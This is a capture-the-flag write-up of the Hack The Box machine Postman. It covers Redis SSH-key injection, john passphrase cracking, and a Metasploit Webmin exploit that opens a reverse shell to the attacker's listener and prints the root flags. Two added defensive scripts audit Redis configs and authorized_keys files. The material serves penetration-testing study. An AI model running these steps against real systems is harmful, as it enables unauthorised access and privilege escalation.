OSCP Study Notes

Postman HTB Writeup

2023-03-12  doinb1517

Key points

1. Exploiting an unauthenticated Redis instance

2. Using the Webmin vulnerability module in msf to get a shell directly

3. When the usual nmap command does not find everything, rescan the full port range

Walkthrough

Access as redis

A standard nmap scan shows ports 22, 80 and 10000 open

┌──(kali㉿192)-[~]
└─$ nmap -sC -sV 10.10.10.160
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-13 09:48 CST
Nmap scan report for 10.10.10.160
Host is up (0.30s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 375.88 seconds

Visiting port 80 directly gives us the domain name and a welcome page

Visiting port 10000 directly, we are told to use https

Switching to https we find a login page; trying a few weak passwords gets us nowhere

Trying directory brute-forcing

gobuster dir -u http://postman/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 20

It turns up plenty of irrelevant directories, so this path leads nowhere. The earlier nmap scan can miss a lot of ports (by default it only covers the 1000 most common ones), so we adjust the scan to cover all ports and find 6379 open, running Redis.

nmap -p- 10.10.10.160

PORT     STATE SERVICE
6379/tcp open  redis

Connecting with redis-cli, no authentication is required: the Redis instance is exposed without auth.

┌──(kali㉿192)-[~]
└─$ redis-cli -h 10.10.10.160                                               1 ⨯
10.10.10.160:6379> ping
PONG
10.10.10.160:6379>
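
As an added defender's-side example (not code from the original writeup), here is a small Python auditor for the redis.conf settings that make the steps below possible: a network-facing bind, protected mode off, no password, and a reachable CONFIG command. Both sample configs are constructed for illustration, not the target's real configuration; `WEAK_CONF` mirrors a password-less, network-exposed setup, `HARDENED_CONF` shows the corrected settings.

```python
"""Audit a redis.conf for the weaknesses behind the unauthenticated
CONFIG SET dir / dbfilename / SAVE technique. Added example, not
part of the original writeup."""
from typing import Dict, List

# Constructed sample config: exposed on every interface, no auth (assumption for illustration)
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed hardened counterpart; on Redis 6+ an ACL 'user' rule can replace requirepass
HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass CHANGE-ME-to-a-long-random-secret
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
dbfilename dump.rdb
"""

# Bind addresses that expose the service to every interface
ALL_INTERFACES = {"0.0.0.0", "::", "*", "-::*"}


def parse_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive (lower-cased) to the argument lists it was given.
    Only full-line '#' comments exist in redis.conf, so no inline stripping."""
    conf: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = line.split()
        conf.setdefault(name.lower(), []).append(args)
    return conf


def audit(text: str) -> List[str]:
    """Return human-readable findings; an empty list means none of the audited weaknesses is present."""
    conf = parse_conf(text)
    findings: List[str] = []

    # No bind line at all means "listen everywhere", as does a wildcard address
    bound = [addr for args in conf.get("bind", []) for addr in args]
    if not bound or any(addr in ALL_INTERFACES for addr in bound):
        findings.append("bind: Redis listens on all interfaces (bind to loopback or a private address)")

    # protected-mode defaults to yes since 3.2; it refuses remote clients when no bind/password is set
    mode = conf.get("protected-mode", [["yes"]])[-1]
    if not mode or mode[0].lower() != "yes":
        findings.append("protected-mode no: remote unauthenticated clients are not refused")

    # Without a password (or ACL users) anyone who can connect may run CONFIG SET and SAVE
    if "requirepass" not in conf and "user" not in conf:
        findings.append("no requirepass / ACL user rules: any client can issue CONFIG SET and SAVE")

    # rename-command CONFIG "" removes the command that retargets dir and dbfilename
    def disabled(cmd: str) -> bool:
        return any(len(a) == 2 and a[0].upper() == cmd and a[1] in ('""', "''")
                   for a in conf.get("rename-command", []))
    if not disabled("CONFIG"):
        findings.append("CONFIG is reachable: it can point dir/dbfilename at any directory redis can write")

    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(text) or "OK")
```

Running it prints four findings for the weak config and OK for the hardened one; the same audit can be pointed at a live instance's output from `CONFIG GET *` if the command has not been disabled.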

We can write an SSH public key into the box. First generate an SSH key pair

ssh-keygen -t rsa

Pad the public key with a couple of newlines before and after it (so the key line stays intact on its own line inside the binary RDB dump)

(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 111.txt

Check Redis's current working directory and change it to the .ssh directory

10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir ./.ssh
OK
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"

Write the SSH public key into a key

cat 111.txt | redis-cli -h 10.10.10.160 -x set xxx

Tell Redis that the dump filename is authorized_keys, then save

10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379>

Once that is done, ssh into the target; we land as the redis user

ssh -i id_rsa redis@10.10.10.160
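
On the host side, the authorized_keys file this technique leaves behind is a recognisable artifact: an RDB dump (starting with the magic bytes REDIS) with a key line floating inside it. sshd skips lines it cannot parse, which is why the surrounding binary junk does not stop the login. As an added example (not from the original post), this Python checker flags such files; the sample file contents are constructed, including a fake key, so it runs offline.

```python
"""Inspect an authorized_keys file for signs that it was written by a Redis
SAVE rather than by an administrator. Added example, not part of the writeup."""
import re
from typing import Dict, List, Tuple

RDB_MAGIC = b"REDIS"

# One OpenSSH public key entry: [options] keytype base64 [comment]
KEY_LINE = re.compile(
    rb"(?:^|\s)(ssh-rsa|ssh-ed25519|ecdsa-sha2-nistp(?:256|384|521)|ssh-dss"
    rb"|sk-ssh-ed25519@openssh\.com|sk-ecdsa-sha2-nistp256@openssh\.com)"
    rb"\s+([A-Za-z0-9+/]+={0,2})(?:\s+(.*))?$"
)

# Constructed fake key material (not a real key) and a rough imitation of an RDB dump around it
FAKE_KEY_B64 = "AAAAB3NzaC1yc2EAAAADAQABAAABAQC" + "x" * 40
SAMPLE_TAMPERED = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\xfa\nredis-bits\xc0@\xfe\x00\xfb\x01\x00\x00\x03xxx"
    + b"\n\nssh-rsa " + FAKE_KEY_B64.encode() + b" attacker@kali\n\n"
    + b"\xff\x01\x02\x03\x04\x05\x06\x07\x08"
)
SAMPLE_CLEAN = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI" + b"y" * 43 + b" ops@bastion\n"


def is_binary(line: bytes) -> bool:
    """True if the line holds bytes outside printable ASCII (tab allowed)."""
    return any(b != 9 and not 0x20 <= b <= 0x7E for b in line)


def inspect_authorized_keys(data: bytes) -> Dict[str, List]:
    """Return the parsed key entries plus findings that indicate tampering."""
    keys: List[Tuple[str, str]] = []
    findings: List[str] = []

    if data.startswith(RDB_MAGIC):
        findings.append("file begins with Redis RDB magic 'REDIS': written by a Redis SAVE, not an admin")

    for n, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue  # sshd ignores blank and comment lines
        m = KEY_LINE.search(line)
        if m:
            comment = (m.group(3) or b"").decode("utf-8", errors="replace")
            keys.append((m.group(1).decode(), comment))
        elif is_binary(line):
            findings.append(f"line {n}: binary garbage, sshd will skip it (typical of an RDB-wrapped key)")
        else:
            findings.append(f"line {n}: unparseable entry")

    return {"keys": keys, "findings": findings}


if __name__ == "__main__":
    for label, blob in (("tampered", SAMPLE_TAMPERED), ("clean", SAMPLE_CLEAN)):
        result = inspect_authorized_keys(blob)
        print(label, result["keys"], result["findings"])
```

A file-integrity monitor or a periodic cron job can run this over every `~/.ssh/authorized_keys` on a host; any key whose comment names a machine the team does not own, or any file with RDB magic, is worth an incident ticket rather than a cleanup.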

Access as Matt

We find a user named Matt

redis@Postman:/home/Matt$ cat user.txt 
cat: user.txt: Permission denied
redis@Postman:/home/Matt$ ls -al
total 52
drwxr-xr-x 6 Matt Matt 4096 Sep 11  2019 .
drwxr-xr-x 3 root root 4096 Sep 11  2019 ..
-rw------- 1 Matt Matt 1676 Sep 11  2019 .bash_history
-rw-r--r-- 1 Matt Matt  220 Aug 25  2019 .bash_logout
-rw-r--r-- 1 Matt Matt 3771 Aug 25  2019 .bashrc
drwx------ 2 Matt Matt 4096 Aug 25  2019 .cache
drwx------ 3 Matt Matt 4096 Aug 25  2019 .gnupg
drwxrwxr-x 3 Matt Matt 4096 Aug 25  2019 .local
-rw-r--r-- 1 Matt Matt  807 Aug 25  2019 .profile
-rw-rw-r-- 1 Matt Matt   66 Aug 26  2019 .selected_editor
drwx------ 2 Matt Matt 4096 Aug 26  2019 .ssh
-rw-rw---- 1 Matt Matt   33 Mar 13 01:43 user.txt
-rw-rw-r-- 1 Matt Matt  181 Aug 25  2019 .wget-hsts
redis@Postman:/home/Matt$ ls -al .ssh
ls: cannot open directory '.ssh': Permission denied
redis@Postman:/home/Matt$

We have no permission to read Matt's files, and Matt also has a .ssh directory that we cannot read either. So we go back to the redis user's home directory and check its .bash_history for a lead

redis@Postman:/home/Matt$ cd ~
redis@Postman:~$ pwd
/var/lib/redis
redis@Postman:~$ ls
6379  dkixshbr.so  dump.rdb  ibortfgq.so  module.o  qcbxxlig.so  vlpaulhk.so
redis@Postman:~$ ls -al
total 660
drwxr-x---  7 redis redis   4096 Sep 30  2020 .
drwxr-xr-x 38 root  root    4096 Sep 29  2020 ..
drwxr-xr-x  2 root  root    4096 Oct 25  2019 6379
-rw-------  1 redis redis    399 Oct 25  2019 .bash_history
drwx------  2 redis redis   4096 Aug 25  2019 .cache
-rw-r-----  1 redis redis  46760 Aug 26  2019 dkixshbr.so
-rw-rw----  1 redis redis     92 Sep 30  2020 dump.rdb
drwx------  3 redis redis   4096 Aug 25  2019 .gnupg
-rw-r-----  1 redis redis  46760 Aug 25  2019 ibortfgq.so
drwxrwxr-x  3 redis redis   4096 Aug 26  2019 .local
-rw-r-----  1 redis redis 440656 Aug 25  2019 module.o
-rw-r-----  1 redis redis  46760 Aug 25  2019 qcbxxlig.so
drwxr-xr-x  2 redis root    4096 Mar 13 03:13 .ssh
-rw-r-----  1 redis redis  46760 Aug 25  2019 vlpaulhk.so
redis@Postman:~$ cat .bash_history 
exit
su Matt
pwd
nano scan.py
python scan.py
nano scan.py
clear
nano scan.py
clear
python scan.py
exit
exit
cat /etc/ssh/sshd_config 
su Matt
clear
cd /var/lib/redis
su Matt
exit
cat id_rsa.bak 
ls -la
exit
cat id_rsa.bak 
exit
ls -la
crontab -l
systemctl enable redis-server
redis-server
ifconfig
netstat -a
netstat -a
netstat -a
netstat -a
netstat -a > txt
exit
crontab -l
cd ~/
ls
nano 6379
exit
redis@Postman:~$

There is a cat id_rsa.bak command in the history, so let's look for that file

redis@Postman:/tmp$ find / -name id_rsa.bak > /tmp/res.txt
redis@Postman:/tmp$ cat res.txt 
/opt/id_rsa.bak

We find the backup file /opt/id_rsa.bak. Cracking its passphrase with john gives us computer2008

john xxx.john -w=path_rockyou.txt

Logging into the web login page with that username and password succeeds

Access as root

Use msf to get a shell; the shell we get is root straight away (don't forget set SSL true, or it will not succeed)

msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[-] Exploit aborted due to failure: unknown: Failed to retrieve session cookie
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/webmin_packageup_rce) > show options 

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   computer2008     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:por
                                         t[,type:host:port][...]
   RHOSTS     10.10.10.160     yes       The target host(s), see https://githu
                                         b.com/rapid7/metasploit-framework/wik
                                         i/Using-Metasploit
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connec
                                         tions
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   Matt             yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.4       yes       The listen address (an interface may be s
                                     pecified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910


msf6 exploit(linux/http/webmin_packageup_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[+] Session cookie: f243b9ec75daac5f6fa32afc2186aadc
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.4:4444 -> 10.10.10.160:55008) at 2023-03-13 13:23:33 +0800

id
uid=0(root) gid=0(root) groups=0(root)
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash


root@Postman:/usr/share/webmin/package-updates/# 
root@Postman:/usr/share/webmin/package-updates/# cat /home/Matt/user.txt
cat /home/Matt/user.txt
859ee85473f07d96d588bac79aa247b4
root@Postman:/usr/share/webmin/package-updates/# cat /root/root.txt
cat /root/root.txt
f120ddecc80af581768cb282e8a00bc5

